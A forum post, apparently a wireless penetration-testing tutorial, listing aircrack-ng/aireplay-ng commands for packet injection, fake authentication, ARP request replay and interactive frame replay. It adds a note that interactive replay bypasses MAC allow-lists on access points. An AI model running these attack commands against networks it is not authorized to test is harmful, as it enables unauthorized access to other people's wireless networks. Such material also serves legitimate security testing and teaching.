InfoSec Forums InfoSec Forums Wireless Penetration Testing All about Wireless Attacks Part I

This topic contains 0 replies, has 1 voice, and was last updated by  ddos-admin 3 months ago.

  • Author
    Posts
  • #2964

    ddos-admin
    Keymaster
    • Topics:11
    • Comments:7
    • Newbie

    Common Commands Used in Aircrack-ng

    injection command

    aireplay-ng -3 -b <bssid MAC address> -h <source MAC address> ath0
    aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:46:11:19 ath0
    Fake Authentication Commands

    aireplay-ng -1 0 -e <SSID> -a <bssid MAC address> -h <source MAC address> ath0
    aireplay-ng -1 0 -e linksys-a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
    Or another variation for picky access points

    aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

     

    Arp Replay Attack

    aireplay-ng -3 -b 00:13:10:30:24:9C  mon0

    Where:
    -3 means standard arp request replay
    -b 00:13:10:30:24:9C is the access point MAC address
    -h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
    ath0 is the wireless interface name
    Basic usage:
    aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
    Where:

    -3 means standard arp request replay
    -b 00:13:10:30:24:9C is the access point MAC address
    -h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
    ath0 is the wireless interface name
    There are two methods of replaying an ARP which was previously injected. The first and simplest method is to use the same

    command plus the ”-r” to read the output file from your last successful ARP replay.

    aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0
    Where:

    -3 means standard arp request replay
    -b 00:13:10:30:24:9C is the access point MAC address
    -h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
    -r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
    ath0 is the wireless interface name
    The second method is a special case of the interactive packet replay attack. It is presented here since it is complementary to the ARP request replay attack.

    aireplay-ng -2 -r replay_arp-0219-115508.cap ath0
    Where:

    -2 means interactive frame selection
    -r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
    ath0 is the wireless card interface name
    “NOTE” Some access points are configured to only allow selected MAC access to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know
    one of the MAC addresses on the allowed list.Thus, the advantage of the next technique (interactive replay) is that it gets around this control.

     

You must be logged in to reply to this topic.